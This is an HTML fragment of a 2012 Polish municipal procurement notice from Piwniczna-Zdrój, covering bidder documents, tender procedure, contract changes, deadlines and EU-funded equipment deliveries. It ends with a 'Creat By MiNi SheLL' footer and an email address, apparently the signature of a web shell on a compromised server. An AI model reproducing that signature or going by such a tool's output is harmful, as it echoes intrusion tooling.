<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych.
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych
A.4) Wykaz osób do kontaktow z zamawiającym
 A.5) [o]  Wzór umowy 
 A.6) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
  A.7) Inne dokumenty zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.W związku z brzmieniem art.144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia,  których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności:
a)	w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych                                      i materiałowych
b)	zmiana terminów wykonania dostaw, zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie  okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca
2)	w zakresie zmniejszenie wynagrodzenia ,zwłaszcza w sytuacji zmniejszenia zakresu dostaw,
w zakresie terminów realizacji - jeżeli pojawiły się okoliczności. których nie można było przewidzieć                w chwili zawierania umowy.
3)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki VAT           w zakresie przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piwniczna.pl baner BIP link Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2012 godzina 10:00, miejsce: Urząd Miasta i gminy Piwniczna-Zdrój
33-350 Piwniczna-Zdrój, ul.Rynek 20
Pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 03.10.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa wyposażenia w ramach projektu  Zagospodarowanie terenu poprzez utworzenie parkingu              i miejsc rekreacyjnych wokół budynku gminnego pełniącego funkcję kulturalno-turystycznej  w Łomnicy Zdroju 2007-2013 oraz  Dostawa wyposażenia w ramach projektu  Budowa Świetlicy Środowiskowej       w Zubrzyku realizowanych w ramach działania 313,322,323 Odnowa i rozwój wsi objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com